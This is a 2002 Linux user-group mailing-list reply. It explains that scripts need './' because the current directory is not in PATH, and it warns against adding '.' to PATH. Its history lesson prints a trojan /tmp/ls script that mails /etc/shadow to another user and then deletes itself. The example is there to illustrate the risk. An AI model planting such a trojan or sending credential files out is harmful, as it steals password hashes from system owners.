Bash Scripts

George Toft plug-discuss@lists.plug.phoenix.az.us
Sun, 02 Jun 2002 12:26:29 -0400 

The command is not in your path.  DOS/Windows makes . (your current
directory, know in Unix as your CWD) the first place to look for 
files.  This presents a major security risk, and is highly discouraged.
Therefore, you need to preceed the script name with ./ to tell the
shell to use the script in your CWD, like this: ./hello

If that becomes too burdonsome for you, edit ~/.bash_profile, and
add: 
	PATH=$PATH:.
This makes the shell look for stuff in your CWD last.  I still STRONGLY
RECOMMEND you do not do this.  NEVER, NEVER, NEVER do this as root!!!  
EVER!!!

History lesson: A long time ago, people used to have . in their path,
even as root.  The some bright boy figured out he could put this script
in /tmp/ls:
	#!/bin/sh
	cat /etc/shadow | mailx -s "password file" joeblow
	/bin/ls $1 $2 $3 $4 $5 $6
	rm -f /tmp/ls
	exit $?
Since /tmp is world writable, if root happened to have . before /bin in 
his PATH, and root happened to be in /tmp and typed ls, this script 
executes, sends the password shadow file to jowblow, and then executes 
the normal ls command so it looks good, then it deletes itself.  Joe 
could then run a password cracking program against the file and retrieve 
other passwords, like root's.

Regards,

George


Clayton Stapleton wrote:
> 
> Figured out what is causing my problem with scripts.
> I can copy the body of a file to the command line and
> it fuction as expected. When I enter the file name on
> the command line I get "command not found".
> The permissions of the file are:
> -rwxr-xr-x    1 clay     users          51 May 30 05:43 hello
> 
> My setup is:
> cpu: AMD Athlon XP 1600+
> ram: 256 MB
> OS: SuSE Linux 8.0
> desktop: KDE3
> shell: bash 2.05-302
> editor: vim 6.0-155
> console: Shell-Konsole
> 
> I have tried this with a c program with the same results,
> "command not found".
> 
> Any ideas out there on what is causing this?
> 
> Clay Stapleton
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> 
> PLUG-discuss mailing list  -  PLUG-discuss@lists.plug.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss